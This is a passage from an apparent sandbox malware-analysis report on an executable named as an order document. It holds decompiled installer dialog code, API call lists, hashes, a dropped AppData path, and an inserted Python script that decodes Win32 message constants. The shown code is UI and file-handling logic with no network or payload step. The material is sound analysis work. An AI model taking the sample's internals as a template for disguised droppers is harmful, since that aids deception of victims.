                                                				} else {
                                                					_v32 = 0;
                                                					_v16 = 2;
                                                					 *0x7a8aa0 = _t306;
                                                					 *0x7a1f38 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
                                                					_t252 = LoadBitmapW( *0x7a8a40, 0x6e);
                                                					 *0x7a1f2c =  *0x7a1f2c | 0xffffffff;
                                                					_t313 = _t252;
                                                					 *0x7a1f34 = SetWindowLongW(_v8, 0xfffffffc, E00405105);
                                                					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x7a1f24 = _t254;
                                                					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x7a1f24);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t313);
                                                					_t314 = 0;
                                                					do {
                                                						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                							if(_t314 != 0x20) {
                                                								_v16 = _t282;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406054(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                						}
                                                						_t314 = _t314 + 1;
                                                					} while (_t314 < 0x21);
                                                					_t315 = _a16;
                                                					_t283 = _v16;
                                                					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                					_push(0x15);
                                                					E004040F6(_a4);
                                                					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                					_push(0x16);
                                                					E004040F6(_a4);
                                                					_t316 = 0;
                                                					_t284 = 0;
                                                					if( *0x7a8a6c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t302 = _v20 + 8;
                                                						_v28 = _t302;
                                                						do {
                                                							_t270 =  &(_t302[0x10]);
                                                							if( *_t270 != 0) {
                                                								_v60 = _t270;
                                                								_t271 =  *_t302;
                                                								_t294 = 0x20;
                                                								_v84 = _t284;
                                                								_v80 = 0xffff0002;
                                                								_v76 = 0xd;
                                                								_v64 = _t294;
                                                								_v40 = _t316;
                                                								_v68 = _t271 & _t294;
                                                								if((_t271 & 0x00000002) == 0) {
                                                									if((_t271 & 0x00000004) == 0) {
                                                										 *( *0x7a1f38 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                									} else {
                                                										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                									}
                                                								} else {
                                                									_v76 = 0x4d;
                                                									_v44 = 1;
                                                									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                									_v32 = 1;
                                                									 *( *0x7a1f38 + _t316 * 4) = _t276;
                                                									_t284 =  *( *0x7a1f38 + _t316 * 4);
                                                								}
                                                							}
                                                							_t316 = _t316 + 1;
                                                							_t302 =  &(_v28[0x818]);
                                                							_v28 = _t302;
                                                						} while (_t316 <  *0x7a8a6c);
                                                						if(_v32 != 0) {
                                                							L20:
                                                							if(_v16 != 0) {
                                                								E0040412B(_v8);
                                                								_t282 = 0;
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E0040412B(_v12);
                                                								L91:
                                                								return E0040415D(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}
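The listing above is raw decompiler output, so every control message in it appears as a bare hex immediate. As an added example (not part of the Joe Sandbox report), the Python below resolves the constants that are standard Win32 values, which is the first step in reading a dialog procedure like this one: messages compared against the uMsg argument `_a8`, the message passed to SendMessageW, and the NMHDR.code field (offset 8 of the structure that WM_NOTIFY passes in lParam) compared at `+ 8`. Notification codes are negative, which is why they show up as 0xfffffeXX; the decoder reinterprets them as signed 32-bit values. Messages in the WM_USER range (0x405, 0x40b, 0x40f, 0x413, 0x419, 0x420) are private to the program and are only labelled WM_USER+n, since nothing on this page names them. The tables contain only public constants from winuser.h and commctrl.h; the regexes and the excerpt are this example's own.

```python
import re

# Public Win32 constants (winuser.h / commctrl.h). Only values that occur in
# the listing above are included; WM_USER+n messages are deliberately absent
# because their meaning is private to the program being analysed.
WM_USER = 0x0400
TV_FIRST = 0x1100
TVN_FIRST = -400   # tree-view notifications are negative: 0xfffffeXX
NM_FIRST = 0

WINDOW_MESSAGES = {
    0x004E: "WM_NOTIFY",
    0x0110: "WM_INITDIALOG",
    0x0111: "WM_COMMAND",
    0x0200: "WM_MOUSEMOVE",
    0x0143: "CB_ADDSTRING",
    0x0147: "CB_GETCURSEL",
    0x014E: "CB_SETCURSEL",
    0x0150: "CB_GETITEMDATA",
    0x0151: "CB_SETITEMDATA",
    TV_FIRST + 2:  "TVM_EXPAND",
    TV_FIRST + 9:  "TVM_SETIMAGELIST",
    TV_FIRST + 10: "TVM_GETNEXTITEM",
    TV_FIRST + 27: "TVM_SETITEMHEIGHT",
    TV_FIRST + 28: "TVM_GETITEMHEIGHT",
    TV_FIRST + 50: "TVM_INSERTITEMW",
    TV_FIRST + 63: "TVM_SETITEMW",
}

NOTIFY_CODES = {
    NM_FIRST - 2:   "NM_CLICK",
    TVN_FIRST - 51: "TVN_SELCHANGEDW",
    TVN_FIRST - 55: "TVN_ITEMEXPANDEDW",
}


def to_signed32(value):
    """Reinterpret a 32-bit immediate as signed (0xfffffe3d -> -451)."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def decode_message(value):
    """Name a window message; WM_USER..0x7fff is application-private."""
    if value in WINDOW_MESSAGES:
        return WINDOW_MESSAGES[value]
    if WM_USER <= value < 0x8000:
        return "WM_USER+0x%02x" % (value - WM_USER)
    return "0x%04x" % value


def decode_notify(value):
    """Name an NMHDR.code value given as the raw 32-bit immediate."""
    code = to_signed32(value)
    if code in NOTIFY_CODES:
        return NOTIFY_CODES[code]
    if TVN_FIRST - 99 <= code <= TVN_FIRST:
        return "TVN_FIRST-%d" % (TVN_FIRST - code)
    return "%d" % code


# The three places a message constant appears in this decompiler dialect:
# second argument of SendMessageW, comparison against uMsg (_a8), and
# comparison against NMHDR.code at offset 8 of the WM_NOTIFY lParam.
SENDMSG = re.compile(r"SendMessageW\([^,]+,\s*(0x[0-9a-fA-F]+)")
UMSG = re.compile(r"_a8\s*[!=]=\s*(0x[0-9a-fA-F]+)")
NMCODE = re.compile(r"\+\s*8\)\)\s*[!=]=\s*(0x[0-9a-fA-F]+)")


def annotate_listing(text):
    """Map each hex literal used as a message or notify code to its name."""
    names = {}
    for pattern, decoder in ((SENDMSG, decode_message),
                             (UMSG, decode_message),
                             (NMCODE, decode_notify)):
        for m in pattern.finditer(text):
            names[m.group(1)] = decoder(int(m.group(1), 16))
    return names


# Constructed excerpt: lines copied from the listing above. Note that 0x408
# is compared against offset 4 (NMHDR.idFrom, a control ID), not offset 8,
# so it is correctly left out of the result.
LISTING_EXCERPT = """
    if(_a8 != 0x110) {
    if(_a8 == 0x4e || _a8 == 0x413) {
    if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
    if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
        SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
    if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
    if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
    SendMessageW(_v8, 0x1109, 2,  *0x7a1f24);
    if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
    SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406054(_t282, _t314, _t318, _t282, _t260)), _t314);
    *( *0x7a1f38 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
"""

if __name__ == "__main__":
    for literal, name in sorted(annotate_listing(LISTING_EXCERPT).items()):
        print("%-12s %s" % (literal, name))
```

Run as a script it prints one line per literal, e.g. `0xfffffe3d TVN_SELCHANGEDW` and `0x1132 TVM_INSERTITEMW`; running `annotate_listing` over the whole function body instead of the excerpt works the same way. The 0xfffffffc and 0xfffffff0 passed to SetWindowLongW/GetWindowLongW are GWL_WNDPROC and GWL_STYLE (-4 and -16) and go through the same `to_signed32` conversion if you extend the patterns to cover them.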
                                                 Instruction address column for the listing above, detached from the code by extraction: one address per code line, 0x00404b1c through 0x00405031 in this excerpt; entries of 0x00000000 carry no address.
                                                0x00405033
                                                0x00405033
                                                0x00405023
                                                0x00405025
                                                0x00405025
                                                0x00405053
                                                0x0040505f
                                                0x0040506e
                                                0x0040506e
                                                0x00405070
                                                0x00405073
                                                0x0040507c
                                                0x00000000
                                                0x00404f83
                                                0x00404f8e
                                                0x00404f91
                                                0x00404f96
                                                0x00404f98
                                                0x00404f9c
                                                0x00404fac
                                                0x00404fb6
                                                0x00404fb8
                                                0x00404fbb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404f9e
                                                0x00404f9e
                                                0x00404fa4
                                                0x00404fa6
                                                0x00404fa6
                                                0x00404fa7
                                                0x00404fa8
                                                0x00000000
                                                0x00404f9e
                                                0x00404f81
                                                0x00404f5c
                                                0x00404e9f
                                                0x00000000
                                                0x00404eb5
                                                0x00404ebf
                                                0x00404ec4
                                                0x00000000
                                                0x00000000
                                                0x00404ed6
                                                0x00404edb
                                                0x00404ee7
                                                0x00404ee7
                                                0x00404ee9
                                                0x00404ef8
                                                0x00404efa
                                                0x00404efe
                                                0x00404f01
                                                0x00000000
                                                0x00404f01
                                                0x00404e9f
                                                0x00404b5f
                                                0x00404b64
                                                0x00404b6d
                                                0x00404b74
                                                0x00404b82
                                                0x00404b8d
                                                0x00404b93
                                                0x00404ba1
                                                0x00404bb5
                                                0x00404bba
                                                0x00404bc7
                                                0x00404bcc
                                                0x00404be2
                                                0x00404bf3
                                                0x00404c00
                                                0x00404c00
                                                0x00404c03
                                                0x00404c09
                                                0x00404c0b
                                                0x00404c0e
                                                0x00404c13
                                                0x00404c18
                                                0x00404c1a
                                                0x00404c1a
                                                0x00404c3a
                                                0x00404c3a
                                                0x00404c3c
                                                0x00404c3d
                                                0x00404c42
                                                0x00404c45
                                                0x00404c48
                                                0x00404c4c
                                                0x00404c51
                                                0x00404c56
                                                0x00404c5a
                                                0x00404c5f
                                                0x00404c64
                                                0x00404c66
                                                0x00404c6e
                                                0x00404d39
                                                0x00404d4c
                                                0x00000000
                                                0x00404c74
                                                0x00404c77
                                                0x00404c7a
                                                0x00404c7d
                                                0x00404c7d
                                                0x00404c84
                                                0x00404c8a
                                                0x00404c8d
                                                0x00404c93
                                                0x00404c94
                                                0x00404c99
                                                0x00404ca2
                                                0x00404ca9
                                                0x00404cac
                                                0x00404caf
                                                0x00404cb2
                                                0x00404cee
                                                0x00404d17
                                                0x00404cf0
                                                0x00404cfd
                                                0x00404cfd
                                                0x00404cb4
                                                0x00404cb7
                                                0x00404cc6
                                                0x00404cd0
                                                0x00404cd8
                                                0x00404cdf
                                                0x00404ce7
                                                0x00404ce7
                                                0x00404cb2
                                                0x00404d1d
                                                0x00404d1e
                                                0x00404d2a
                                                0x00404d2a
                                                0x00404d37
                                                0x00404d52
                                                0x00404d56
                                                0x00404d73
                                                0x00404d78
                                                0x00000000
                                                0x00404d58
                                                0x00404d5d
                                                0x00404d66
                                                0x004050f0
                                                0x00405102
                                                0x00405102
                                                0x00404d56
                                                0x00000000
                                                0x00404d37
                                                0x00404c6e

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404B25
                                                • GetDlgItem.USER32 ref: 00404B30
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7A
                                                • LoadBitmapW.USER32(0000006E), ref: 00404B8D
                                                • SetWindowLongW.USER32 ref: 00404BA6
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBA
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCC
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE2
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEE
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C00
                                                • DeleteObject.GDI32(00000000), ref: 00404C03
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2E
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3A
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD0
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D0F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D3E
                                                • SetWindowLongW.USER32 ref: 00404D4C
                                                • ShowWindow.USER32(?,00000005), ref: 00404D5D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5A
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EBF
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED4
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF8
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F18
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F2D
                                                • GlobalFree.KERNEL32 ref: 00404F3D
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB6
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040505F
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508E
                                                • ShowWindow.USER32(?,00000000), ref: 004050DC
                                                • GetDlgItem.USER32 ref: 004050E7
                                                • ShowWindow.USER32(00000000), ref: 004050EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
                                                • Instruction ID: d02e9a787b540977323fb19233601523635b60db84404d8275966fa362dc0732
                                                • Opcode Fuzzy Hash: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
                                                • Instruction Fuzzy Hash: 81027EB0900209EFEB109F94DD85AAE7BB5FB85314F10813AF610BA2E1CB799D51CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00404591(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				intOrPtr _t147;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x7a0f18; // 0x86533c
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E0040575B(0x3fb, _t146);
                                                					E004062C6(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E0040575B(0x3fb, _t146);
                                                							if(E00405AEE(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E00406032(0x79ff10, _t146);
                                                							_t87 = E00406408(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E00406032(0x79ff10, _t146);
                                                								_t89 = E00405A91(0x79ff10);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x79ff10,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x79ff10) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x79ff10,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405A32(0x79ff10);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x79ff10) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404A2E(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								_t147 =  *0x7a7a1c; // 0x8681a6
                                                								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                									E00404A16(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x79ff00);
                                                									} else {
                                                										E0040494D(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x7a8ae4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E00404118(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x7a1f30 == _t158) {
                                                									E00404526();
                                                								}
                                                								 *0x7a1f30 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x7a1f40;
                                                							_v60 = E004048E7;
                                                							_v56 = _t146;
                                                							_v68 = E00406054(_t146, 0x7a1f40, _t167, 0x7a0718, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E004059E6(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x7a8a50 + 0x11c));
                                                								if( *((intOrPtr*)( *0x7a8a50 + 0x11c)) != 0 && _t146 == L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") {
                                                									E00406054(_t146, 0x7a1f40, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x7a69e0, 0x7a1f40) != 0) {
                                                										lstrcatW(_t146, 0x7a69e0);
                                                									}
                                                								}
                                                								 *0x7a1f30 =  *0x7a1f30 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405A5D(_t146) != 0 && E00405A91(_t146) == 0) {
                                                						E004059E6(_t146);
                                                					}
                                                					 *0x7a7a18 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E004040F6(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E004040F6(_t167);
                                                					E0040412B(_t166);
                                                					_t138 = E00406408(6);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E0040415D(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • GetDlgItem.USER32 ref: 004045E0
                                                • SetWindowTextW.USER32(00000000,?), ref: 0040460A
                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046BB
                                                • CoTaskMemFree.OLE32(00000000), ref: 004046C6
                                                • lstrcmpiW.KERNEL32(ExecToStack,007A1F40,00000000,?,?), ref: 004046F8
                                                • lstrcatW.KERNEL32(?,ExecToStack), ref: 00404704
                                                • SetDlgItemTextW.USER32 ref: 00404716
                                                  • Part of subcall function 0040575B: GetDlgItemTextW.USER32(?,?,00000400,0040474D), ref: 0040576E
                                                  • Part of subcall function 004062C6: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406329
                                                  • Part of subcall function 004062C6: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
                                                  • Part of subcall function 004062C6: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 0040633D
                                                  • Part of subcall function 004062C6: CharPrevW.USER32(0040A300,0040A300,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406350
                                                • GetDiskFreeSpaceW.KERNEL32(0079FF10,?,?,0000040F,?,0079FF10,0079FF10,?,00000001,0079FF10,?,?,000003FB,?), ref: 004047D9
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047F4
                                                  • Part of subcall function 0040494D: lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049EE
                                                  • Part of subcall function 0040494D: wsprintfW.USER32 ref: 004049F7
                                                  • Part of subcall function 0040494D: SetDlgItemTextW.USER32 ref: 00404A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$ExecToStack
                                                • API String ID: 2624150263-2684797225
                                                • Opcode ID: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
                                                • Instruction ID: 30da9b98090b1fe5a0259897bb92749c5f748b87693770e47a0c546725bed2a9
                                                • Opcode Fuzzy Hash: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
                                                • Instruction Fuzzy Hash: 3FA19FB1900208ABDB11EFA5CD81AAFB7B8EF85354F10843BF601B62D1D77C89418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E004027FB(short __ebx, short* __esi) {
                                                				void* _t21;
                                                
                                                				if(FindFirstFileW(E00402BBF(2), _t21 - 0x2b0) != 0xffffffff) {
                                                					E00405F79( *((intOrPtr*)(_t21 - 0x10)), _t8);
                                                					_push(_t21 - 0x284);
                                                					_push(__esi);
                                                					E00406032();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0x10)))) = __ebx;
                                                					 *__esi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}


                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
                                                • Instruction ID: a3d3032162d61e1c1d424b84de3592b50f389daf4c4fdff0a19fa7bc5af75a0d
                                                • Opcode Fuzzy Hash: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
                                                • Instruction Fuzzy Hash: 2BF05E716001149BC701EBA4DE49AAEB378FF04324F10457BE115E31D1D6B88A409B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E00404293(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				char _v8;
                                                				int _v12;
                                                				void* _v16;
